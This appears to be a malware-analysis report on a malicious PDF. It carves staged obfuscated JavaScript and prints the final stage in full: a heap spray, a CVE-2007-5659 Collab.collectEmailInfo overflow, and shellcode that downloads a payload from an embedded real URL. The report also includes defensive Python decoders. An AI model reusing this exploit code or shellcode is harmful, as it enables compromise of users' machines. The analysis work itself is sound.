Verdict: MALICIOUS
Risk score: 266

Malware Insights

MITRE ATT&CK
- T1059.007 Command and Scripting Interpreter: JavaScript (the /JavaScript action and /JS stream carried by the PDF)
- T1204.002 User Execution: Malicious File (the document has to be opened in Adobe Reader for the script to run)
- T1203 Exploitation for Client Execution (CVE-2007-5659 Collab.collectEmailInfo buffer overflow, see the heuristics below)
- T1105 Ingress Tool Transfer (shellcode download-and-execute of a second stage from the embedded URL)
The PDF carries a /JavaScript action whose /JS stream (object 4) unpacks in four stages, each carved below. Stage 1 is a comma-separated list of character codes decoded with String.fromCharCode. Stage 2 calls app.doc.syncAnnotScan() (a no-op that only forces annotation enumeration), reads the /Subject of annotation 1 on page 0 through app.doc.getAnnots({nPage: 0}), hex-decodes it, and evaluates it through app['eval'], assembling the name from the fragments 'ev' + 'a' + 'l' so the literal never appears in the script; every step is gated on app.plugIns.length, so an emulator that reports no plug-ins never reaches the eval. Stage 3 decodes the /Subject of annotation 0 with a key derived from the decimal digits of its own source text, so any edit to the function breaks the decoding, and evals the result. The final stage takes the highest app.plugIns[].version and, only if it falls in (>= 8 and < 8.1.1) or (< 7.1), runs 50 ms later via app.setTimeOut: it sprays 48 JavaScript strings sized so that each occupies 4 MB (0x400000) in memory, 0x0c0c padding followed by a short stager, towards 0x0c0c0c0c, then calls Collab.collectEmailInfo with an 18,000-character msg of 0x0c bytes to trigger the CVE-2007-5659 buffer overflow. The %u-escaped shellcode embeds http://googleinru.in/cgi-bin/etn/z005106201r0019R84aff6eaXd89f4463Y698970d2Z01001f50 and performs a download-and-execute of a second-stage payload. Reader 9 falls outside the version gate (the script special-cases viewerVersion 9.103 to 9.13) and is not exploited by this sample.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics (9)

- Collab.collectEmailInfo (CVE-2007-5659). Severity: critical. CVE match: exact. Rule: CVE_2007_5659.
  The PDF JavaScript calls Collab.collectEmailInfo(). CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by an over-long or heap-sprayed msg field passed to Collab.collectEmailInfo(); it is one of a series of Acrobat JavaScript API exploits. Identified after JavaScript deobfuscation.
- JavaScript action. Severity: low. 4 related findings. Rule: PDF_JAVASCRIPT.
  The PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659). Severity: high. CVE match: likely. Rule: PDF_JS_ADOBE_APSB08_13_PATCH_GATE.
  The PDF JavaScript gates its exploit payload on (version >= 8 && version < 8.1.1) || (version < 7.1): the Reader 7.0.x and 8.0 to 8.1.1 window that Adobe APSB08-13 patched for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits targeting that exact bug check both patch points; benign scripts do not. The version tested is the highest app.plugIns[].version (see legacy_pdfkit_stage_001.js below), so Reader 9 falls outside the gate.
  Matched line in script (truncated):
  var df____FD = new Array();var W__CE7n5 = 0;var w7_m_s_M262F = "";function P4_rtbG(U0NJBw_yN_A_24, FWXFS5Tl7_AGLi){var U_VotY_65i = FWXFS5Tl7_AGLi.toString();var O6_f2k6_l = "";for(var t1_0Xuy = 0; t1_0Xuy < U_VotY_65i.length; t1_0Xuy++) {var L__i_tf77r354 = parseInt(U_VotY_65i.substr(t1_0Xuy, 1));if (!isNaN(L__i_tf77r354)) {L__i_tf77r354 = L__i_tf77r354.toString(16);if (L__i_tf77r354.length == 1) { L__i_tf77r354 = "0" + L__i_tf77r354; }else if (L__i_tf77r354.length != 2) { L__i_tf77r354 = "00"; …
- PDF JavaScript exploit cluster. Severity: critical. Rule: PDF_JS_EXPLOIT_CLUSTER.
  The PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behaviour.
  Matched line in script:
  for (var i=0; i < list.length; i++) { result += String.fromCharCode(list[i] - jump); }
- PDF exploit shellcode contains an embedded download URL. Severity: high. Rule: PDF_JS_SHELLCODE_DOWNLOAD_URL.
  Decoded PDF exploit shellcode contains a hardcoded http(s) URL, stored either as little-endian %uXXXX Unicode escapes or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. In this sample it is the %u form, inside the shellcode literal of legacy_pdfkit_stage_001.js, and it is the same URL listed under Embedded URL below. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
- Embedded JS stream. Severity: low. Rule: PDF_JS.
  The PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- syncAnnotScan annotation-staging primitive. Severity: low. Rule: PDF_FOXIT_SYNCANNOTSCAN.
  The PDF JavaScript calls syncAnnotScan(), a no-op annotation-enumeration primitive used by exploit-kit JavaScript to stage payload reads from annotation /Subject fields before eval(). It is not a vulnerable sink itself and is rarely seen in legitimate PDFs. Identified after JavaScript deobfuscation.
- Suspicious extracted artifact. Severity: info. Rule: EXTRACTED_FILE_STATIC_TRIAGE.
  One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL. Severity: info. Rule: EMBEDDED_URL.
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://googleinru.in/cgi-bin/etn/z005106201r0019R84aff6eaXd89f4463Y698970d2Z01001f50 (referenced by PDF JavaScript)
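How the PDF_JS_SHELLCODE_DOWNLOAD_URL finding can be reproduced statically, as an added example in Python (not the analyzer's rule code and not part of the sample): the %uXXXX escapes are decoded the way JavaScript's unescape() decodes them, laid out as little-endian UTF-16 code units the way Acrobat holds the string in memory, and the result is scanned for a NUL-terminated printable http(s) run. The sample input is the tail of the shellcode literal from legacy_pdfkit_stage_001.js on this page; the bytes just before the URL are included so the NUL boundary is exercised. One caveat for anyone comparing against a live capture: at run time rUaE5_3_X__t() appends a version tag built by P4_rtbG() ("3" + hex(23) + "P" + the Reader version digits) after ...1f50 and before the terminating NULs, so the in-memory string continues past the URL the page lists.

```python
"""Added example: extract the download URL from %u-escaped Reader shellcode.
Not the analyzer's own rule implementation and not code from the sample."""
from __future__ import annotations

import re

# JavaScript's legacy unescape(): %uXXXX and %XX each become one UTF-16 code
# unit; every other character is passed through literally.
_JS_ESCAPE = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")

# What URLDownloadToFile will see: a NUL-terminated run of printable ASCII.
_HTTP_URL = re.compile(rb"https?://[\x21-\x7e]+")


def js_unescape(s: str) -> str:
    """Decode a string the way unescape() does inside Acrobat's JS engine."""
    return _JS_ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def memory_bytes(js_string: str) -> bytes:
    """Bytes the string occupies once sprayed: UTF-16 code units, little-endian
    on x86, so "%u7468" is 68 74 = "ht". Lone surrogates are kept as-is because
    shellcode uses arbitrary 16-bit values."""
    return js_string.encode("utf-16-le", "surrogatepass")


def find_download_urls(escaped_shellcode: str) -> list[str]:
    """Return every http(s) URL in the decoded shellcode image. The regex runs
    over the memory image rather than the source text, so a literal that mixes
    plain ASCII with %u escapes needs no special handling either."""
    raw = memory_bytes(js_unescape(escaped_shellcode))
    return [m.group(0).decode("ascii") for m in _HTTP_URL.finditer(raw)]


# Tail of the page's shellcode literal (from legacy_pdfkit_stage_001.js).
SAMPLE_TAIL = (
    "%u7770%u4455%u006c%u7468%u7074%u2f3a%u672f%u6f6f%u6c67%u6965%u726e%u2e75"
    "%u6e69%u632f%u6967%u622d%u6e69%u652f%u6e74%u7a2f%u3030%u3135%u3630%u3032"
    "%u7231%u3030%u3931%u3852%u6134%u6666%u6536%u5861%u3864%u6639%u3434%u3336"
    "%u3659%u3839%u3739%u6430%u5a32%u3130%u3030%u6631%u3035"
)

if __name__ == "__main__":
    for url in find_download_urls(SAMPLE_TAIL):
        print(url)
</test>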
Extracted artifacts (4)
Files carved from inside the sample during analysis.

javascript_obj0004_000.js (stage 1)
Kind: pdf-javascript-stream. Source: PDF /JS object 4 at offset 0xE1. Size: 1940 bytes.
SHA-256: be4694a17eb89a55f7eb3db389ba2bc4f102f4c7dcfc99549d848cdb7df5dfb5
Detection: ClamAV found no threats. Obfuscation or payload: likely (the carved artifact contains 1 eval/decoder/string-building token).
Preview script (first 1,000 lines of the extracted script):

```javascript
sourceCode = "118,97,114,32,112,114,32,61,32,110,117,108,108,59,13,10,118,97,114,32,102,110,99,32,61,32,39,101,118,39,59,13,10,118,97,114,32,115,117,109,32,61,32,39,39,59,13,10,13,10,97,112,112,46,100,111,99,46,115,121,110,99,65,110,110,111,116,83,99,97,110,40,41,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,33,61,32,48,41,32,123,13,10,9,118,97,114,32,110,117,109,32,61,32,49,59,13,10,13,10,9,112,114,32,61,32,97,112,112,46,100,111,99,46,103,101,116,65,110,110,111,116,115,40,13,10,9,9,123,13,10,9,9,9,110,80,97,103,101,58,32,48,13,10,9,9,125,13,10,9,41,59,13,10,13,10,9,115,117,109,32,61,32,112,114,91,110,117,109,93,46,115,117,98,106,101,99,116,59,13,10,125,13,10,13,10,118,97,114,32,98,117,102,32,61,32,34,34,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,32,51,41,32,123,13,10,9,102,110,99,32,43,61,32,39,97,39,59,13,10,9,118,97,114,32,97,114,114,32,61,32,115,117,109,46,115,112,108,105,116,40,47,45,47,41,59,10,9,118,97,114,32,112,114,111,99,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,50,50,43,49,53,41,59,10,9,13,10,9,102,111,114,32,40,118,97,114,32,105,32,61,32,49,59,32,105,32,60,32,97,114,114,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,13,10,9,9,98,117,102,32,43,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,34,48,120,34,43,97,114,114,91,105,93,41,59,13,10,9,125,13,10,125,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,61,32,50,41,32,123,13,10,9,102,110,99,32,43,61,32,39,108,39,59,13,10,9,97,112,112,91,102,110,99,93,40,98,117,102,41,59,13,10,125,13,10";
function decrypt(str, jump){
var result = "";
var list = str.split(',');
for (var i=0; i < list.length; i++) {
result += String.fromCharCode(list[i] - jump);
}
return result;
}
```
numeric_charcode_stage_000.js (stage 2)
Kind: deobfuscated-js. Source: numeric char-code string decoded JavaScript at offset 0xEF. Size: 505 bytes.
SHA-256: 6c41320119e160dc719997b9a2efb3600ea9d7e9d7e44b4dc2125762dc9f365f
Detection: ClamAV found no threats. Obfuscation or payload: likely (the carved artifact contains 2 eval/decoder/string-building tokens).
Preview script (first 1,000 lines of the extracted script):

```javascript
var pr = null;
var fnc = 'ev';
var sum = '';
app.doc.syncAnnotScan();
if (app.plugIns.length != 0) {
var num = 1;
pr = app.doc.getAnnots(
{
nPage: 0
}
);
sum = pr[num].subject;
}
var buf = "";
if (app.plugIns.length > 3) {
fnc += 'a';
var arr = sum.split(/-/);
var proc = String.fromCharCode(22+15);
for (var i = 1; i < arr.length; i++) {
buf += String.fromCharCode("0x"+arr[i]);
}
}
if (app.plugIns.length >= 2) {
fnc += 'l';
app[fnc](buf);
}
```
legacy_pdfkit_stage_000.js (stage 3)
Kind: deobfuscated-js. Source: repeated-marker hex decoded JavaScript at offset 0x1BAD. Size: 1739 bytes.
SHA-256: 18be611ac4960b30990ca89e798ccca2741995b39e35e5919afacdcafa28f384
Detection: ClamAV found no threats. Obfuscation or payload: likely (the carved artifact contains 1 eval/decoder/string-building token).
Preview script (first 1,000 lines of the extracted script):

```javascript
function R8K_BAi_37v2Ix(MXn_ok, YFO____LnG_0u){var c_C_h_4_5Ub = 4;var gJ452QRfQ_Dya = new Array();var v6U_2_E2l = new Array(107,256,11, 512, 106, 11, 44,40, 33);v6U_2_E2l[5] += 12;var Rh4_y4l = "";try {var w_s8__33N6v2O = 0;if (app) {YFO____LnG_0u = pr[w_s8__33N6v2O].subject;}} catch(e) {}if (!MXn_ok) { gJ452QRfQ_Dya[0] = 0;gJ452QRfQ_Dya[1] = gJ452QRfQ_Dya[0];gJ452QRfQ_Dya[2] = gJ452QRfQ_Dya[1];gJ452QRfQ_Dya[3] = gJ452QRfQ_Dya[2];var kmR1Fd1_M5____a = v6U_2_E2l[6] + 3;var gpDNHo_HgV_a_x = kmR1Fd1_M5____a + 11;var PnXaH_gm4_A1j = R8K_BAi_37v2Ix;var v31_v8nP78fa8 = 0;PnXaH_gm4_A1j = PnXaH_gm4_A1j.toString();for(var fkf_2__U30U6 = 0; fkf_2__U30U6 < PnXaH_gm4_A1j.length; fkf_2__U30U6++) {var Mn84Be = PnXaH_gm4_A1j.charCodeAt(fkf_2__U30U6);if (Mn84Be > kmR1Fd1_M5____a && Mn84Be < gpDNHo_HgV_a_x) {if (v31_v8nP78fa8 == 4) {v31_v8nP78fa8 = 0;}gJ452QRfQ_Dya[v31_v8nP78fa8] += Mn84Be;if (gJ452QRfQ_Dya[v31_v8nP78fa8] > v6U_2_E2l[3]) {gJ452QRfQ_Dya[v31_v8nP78fa8] -= 512;}v31_v8nP78fa8++;}}}else { gJ452QRfQ_Dya = MXn_ok;}for (var IR3Q0_uY = 0; IR3Q0_uY < 4; IR3Q0_uY++) {if (gJ452QRfQ_Dya[IR3Q0_uY] > v6U_2_E2l[1]) {gJ452QRfQ_Dya[IR3Q0_uY] -= v6U_2_E2l[1];}}var wP___x = 0;var S_CSN0Aj = 0;var O1_E__65vVj5;var yDc6_xhp = 0;while ( wP___x < YFO____LnG_0u.length ) {var H__NQN71n__W = "";H__NQN71n__W = YFO____LnG_0u.substr(wP___x, 2);var kxj3_6X_s = parseInt(H__NQN71n__W, v6U_2_E2l[5]); if (S_CSN0Aj == 4) {S_CSN0Aj = 0;}kxj3_6X_s -= (yDc6_xhp + 2) * gJ452QRfQ_Dya[S_CSN0Aj];if (kxj3_6X_s < 0) {kxj3_6X_s -= Math.floor(kxj3_6X_s / v6U_2_E2l[1]) * v6U_2_E2l[1];}Rh4_y4l += String.fromCharCode(kxj3_6X_s);{wP___x += 2;yDc6_xhp++;S_CSN0Aj++;}}var kXW_nx21c = this;kXW_nx21c["eval"](Rh4_y4l);return 0;}
R8K_BAi_37v2Ix(0);
```
legacy_pdfkit_stage_001.js (stage 4, final exploit)
Kind: deobfuscated-js. Source: annotation-subject callee-key decoded JavaScript at offset 0x4C3. Size: 4887 bytes.
SHA-256: 4795547a1885feb2ae7163a604186f68f98cc2519ad5fb47c185d233488665fb
Detection: ClamAV found no threats. Obfuscation or payload: likely (the carved artifact contains 5 eval/decoder/string-building tokens).
Preview script (first 1,000 lines of the extracted script):

```javascript
var df____FD = new Array();var W__CE7n5 = 0;var w7_m_s_M262F = "";function P4_rtbG(U0NJBw_yN_A_24, FWXFS5Tl7_AGLi){var U_VotY_65i = FWXFS5Tl7_AGLi.toString();var O6_f2k6_l = "";for(var t1_0Xuy = 0; t1_0Xuy < U_VotY_65i.length; t1_0Xuy++) {var L__i_tf77r354 = parseInt(U_VotY_65i.substr(t1_0Xuy, 1));if (!isNaN(L__i_tf77r354)) {L__i_tf77r354 = L__i_tf77r354.toString(16);if (L__i_tf77r354.length == 1) { L__i_tf77r354 = "0" + L__i_tf77r354; }else if (L__i_tf77r354.length != 2) { L__i_tf77r354 = "00"; }O6_f2k6_l = L__i_tf77r354 + O6_f2k6_l;}}while(O6_f2k6_l.length < 8) { O6_f2k6_l = "0" + O6_f2k6_l; }var JbD5ox = U0NJBw_yN_A_24.toString(16);if (JbD5ox.length == 1) { JbD5ox = "0" + JbD5ox; }else if (JbD5ox.length != 2) { JbD5ox = "00"; }O6_f2k6_l = "3" + JbD5ox + "P" + O6_f2k6_l;return O6_f2k6_l;}function rUaE5_3_X__t(i_httdr36c3Msc, nU3vmb){var cm3h__v = new Array("");var s_ERcp = i_httdr36c3Msc;var r__52n;if ((r__52n = i_httdr36c3Msc.lastIndexOf("%u00")) != -1) {if (r__52n + 6 == i_httdr36c3Msc.length) {cm3h__v[0] = i_httdr36c3Msc.substr(r__52n + 4, 2);s_ERcp = i_httdr36c3Msc.substring(0, r__52n);}}r__52n = 1;for (t1_0Xuy = 0; t1_0Xuy < nU3vmb.length; t1_0Xuy++) {var Js87JC0_UBkd_16 = nU3vmb.charCodeAt(t1_0Xuy).toString(16);if (Js87JC0_UBkd_16.length == 1) { Js87JC0_UBkd_16 = "0" + Js87JC0_UBkd_16; }cm3h__v[r__52n] = Js87JC0_UBkd_16;r__52n++;}t1_0Xuy = cm3h__v[0].length ? 0 : 1;cm3h__v[r__52n] = "00";cm3h__v[r__52n + 1] = "00";r__52n += 2;if ((cm3h__v.length - t1_0Xuy) % 2) {cm3h__v[r__52n] = "00";}while(t1_0Xuy < cm3h__v.length) {s_ERcp += "%u" + cm3h__v[t1_0Xuy + 1] + cm3h__v[t1_0Xuy];t1_0Xuy += 2;}s_ERcp += "%u0000";return s_ERcp;}function K_t_C3(pKo3deE7_qkEa, xjhf_v_nhF8a_d){while (pKo3deE7_qkEa.length*2<xjhf_v_nhF8a_d) {pKo3deE7_qkEa += pKo3deE7_qkEa;}pKo3deE7_qkEa = pKo3deE7_qkEa.substring(0,xjhf_v_nhF8a_d/2);return pKo3deE7_qkEa;}function kfP___EA_P8qAhi(OE52_2I, l_7b_Ei1CCB_fIm, S_sRn__5jX){var aK7wU_hu276 = 0x0c0c0c0c;var pKo3deE7_qkEa = unescape(l_7b_Ei1CCB_fIm);var nU3vmb = P4_rtbG(OE52_2I, S_sRn__5jX);var i_q__r38c__X024 = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var i_httdr36c3Msc = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc%u0000%u645f%u30a1%u0000%u7800%u8b0c%u0c40%u708b%uad1c%u688b%ueb08%u8b09%u3440%u408d%u8b7c%u3c68%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%uffe8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u7770%u4455%u006c%u7468%u7074%u2f3a%u672f%u6f6f%u6c67%u6965%u726e%u2e75%u6e69%u632f%u6967%u622d%u6e69%u652f%u6e74%u7a2f%u3030%u3135%u3630%u3032%u7231%u3030%u3931%u3852%u6134%u6666%u6536%u5861%u3864%u6639%u3434%u3336%u3659%u3839%u3739%u6430%u5a32%u3130%u3030%u6631%u3035";app.l8k141y87m = unescape(rUaE5_3_X__t(i_httdr36c3Msc, nU3vmb));var ID_e_71_b_w2 = 0x400000;var a_5QdK__XtG_i_w = i_q__r38c__X024.length * 2;var xjhf_v_nhF8a_d = ID_e_71_b_w2 - (a_5QdK__XtG_i_w+0x38);pKo3deE7_qkEa = K_t_C3(pKo3deE7_qkEa, xjhf_v_nhF8a_d);var Xa1_ddSl = (aK7wU_hu276 - 0x400000)/ID_e_71_b_w2;for (var liC7cA2m8h44tUH = 0; liC7cA2m8h44tUH < Xa1_ddSl; liC7cA2m8h44tUH++) {df____FD[liC7cA2m8h44tUH] = pKo3deE7_qkEa + i_q__r38c__X024;}}function Sp3H_OG04f(){var b_g8bC_s = "";for (t1_0Xuy = 0; t1_0Xuy < 12; t1_0Xuy++) {b_g8bC_s += unescape("%u0c0c%u0c0c");}var HCxbGm_831_52h = "";for (t1_0Xuy = 0; t1_0Xuy < 750; t1_0Xuy++) {HCxbGm_831_52h += b_g8bC_s;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: HCxbGm_831_52h});app.clearTimeOut(W__CE7n5);}function QBKG2u(c__l_3u){var Wt_Q_o__I__aek = W__CE7n5;if ((c__l_3u >= 8 && c__l_3u < 8.11) || c__l_3u < 7.1) {kfP___EA_P8qAhi(23, "%u0c0c%u0c0c", c__l_3u);Sp3H_OG04f();}if (Wt_Q_o__I__aek) {app.clearTimeOut(Wt_Q_o__I__aek);}}var S_sRn__5jX = 0;var Kjn8OLI_68MRV = app.plugIns;for (var qL_t___58 = 0; qL_t___58 < Kjn8OLI_68MRV.length; qL_t___58++) {var y25J5oR_q = Kjn8OLI_68MRV[qL_t___58].version;if (y25J5oR_q > S_sRn__5jX) { S_sRn__5jX = y25J5oR_q; }}if (app.viewerVersion == 9.103 && S_sRn__5jX < 9.13) {S_sRn__5jX = 9.13;}app.Y_5FtJ = QBKG2u;W__CE7n5 = app.setTimeOut("app.Y_5FtJ(" + S_sRn__5jX.toString() + ")", 50);
```
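The three decoders the carved stages rely on, re-implemented offline in Python so the chain (stage 1 char codes, stage 2 hex-in-/Subject, stage 3 callee-keyed base-23) can be reproduced without opening the PDF in Acrobat. This is an added example, not code from the analyzer or from the sample. The annotation /Subject strings the real stages read are not on this page, so the stage 2 and stage 3 inputs below are constructed (the stage 3 one with a matching encoder), and the stand-in callee text used for the key is likewise constructed; the only page-derived input is the opening of the stage 1 character-code list. To recover the real stage 3 key, feed derive_callee_key() the text of R8K_BAi_37v2Ix exactly as the target engine's Function.toString() renders it; only the decimal digits in that text matter, so whitespace differences are harmless but any dropped or added digit changes the key.

```python
"""Added example: offline re-implementation of the sample's three stage decoders.
Not the analyzer's code and not the sample's own code."""
from __future__ import annotations


def decode_charcodes(csv_codes: str, jump: int = 0) -> str:
    """Stage 1 (javascript_obj0004_000.js): comma-separated character codes,
    each reduced by `jump` before String.fromCharCode. The sample uses jump 0."""
    return "".join(chr(int(c) - jump) for c in csv_codes.split(","))


def decode_hex_subject(subject: str) -> str:
    """Stage 2 (numeric_charcode_stage_000.js): the /Subject of annotation 1 on
    page 0 is split on '-', the first field is dropped, and each remaining field
    is fed to String.fromCharCode("0x" + field). A non-hex field is NaN there,
    which fromCharCode turns into U+0000; that is mirrored here."""
    out = []
    for field in subject.split("-")[1:]:
        try:
            out.append(chr(int(field, 16) & 0xFFFF))
        except ValueError:
            out.append("\x00")
    return "".join(out)


def derive_callee_key(callee_source: str) -> list[int]:
    """Stage 3 (legacy_pdfkit_stage_000.js) key schedule. The decoder calls
    toString() on itself and folds the ASCII code of every decimal digit in
    that text into four accumulators, round-robin, reducing above 512 and then
    above 256. Editing the function changes the key, so the stage doubles as a
    tamper check."""
    acc = [0, 0, 0, 0]
    slot = 0
    for ch in callee_source:
        code = ord(ch)
        if 47 < code < 58:          # '0'..'9'
            if slot == 4:
                slot = 0
            acc[slot] += code
            if acc[slot] > 512:
                acc[slot] -= 512
            slot += 1
    return [k - 256 if k > 256 else k for k in acc]


def decode_keyed_subject(subject: str, key: list[int], radix: int = 23) -> str:
    """Stage 3 body: the /Subject of annotation 0 is consumed two characters at
    a time as a base-23 number (the radix is hidden as 11 + 12 in the constant
    table); position i subtracts (i + 2) * key[i % 4] and a negative result is
    reduced modulo 256 before String.fromCharCode."""
    out = []
    for i, pos in enumerate(range(0, len(subject), 2)):
        v = int(subject[pos:pos + 2], radix) - (i + 2) * key[i % 4]
        if v < 0:
            v -= (v // 256) * 256    # JS: v -= Math.floor(v / 256) * 256
        out.append(chr(v))
    return "".join(out)


def encode_keyed_subject(plain: str, key: list[int], radix: int = 23) -> str:
    """Inverse of decode_keyed_subject; used here only to build test input."""
    digits = "0123456789abcdefghijklmnopqrstuvwxyz"
    out = []
    for i, ch in enumerate(plain):
        v = (ord(ch) + (i + 2) * key[i % 4]) % 256
        out.append(digits[v // radix] + digits[v % radix])
    return "".join(out)


# Inputs. STAGE1_PREFIX is the start of the page's stage 1 string ("var pr = null;");
# the other two are constructed and are not the sample's real annotation contents.
STAGE1_PREFIX = "118,97,114,32,112,114,32,61,32,110,117,108,108,59"
STAGE2_SUBJECT = "ignored-61-70-70-2e-61-6c-65-72-74-28-31-29-3b"
STAGE3_CALLEE = ("function R8K_BAi_37v2Ix(a, b){var c = 4;"
                 "var t = new Array(107,256,11,512,106,11,44,40,33);t[5] += 12;}")


def run_chain() -> dict:
    """Walk the constructed chain end to end and return each stage's output."""
    key = derive_callee_key(STAGE3_CALLEE)
    keyed = encode_keyed_subject("app.alert(1);", key)
    return {
        "stage1": decode_charcodes(STAGE1_PREFIX),
        "stage2": decode_hex_subject(STAGE2_SUBJECT),
        "key": key,
        "stage3": decode_keyed_subject(keyed, key),
    }


if __name__ == "__main__":
    for name, value in run_chain().items():
        print(f"{name}: {value!r}")
```

With the real sample, decode_hex_subject() takes the /Subject of the second annotation on the first page and derive_callee_key() takes the carved stage 3 function text; the output of decode_keyed_subject() on the first annotation's /Subject is what the analyzer carved as legacy_pdfkit_stage_001.js.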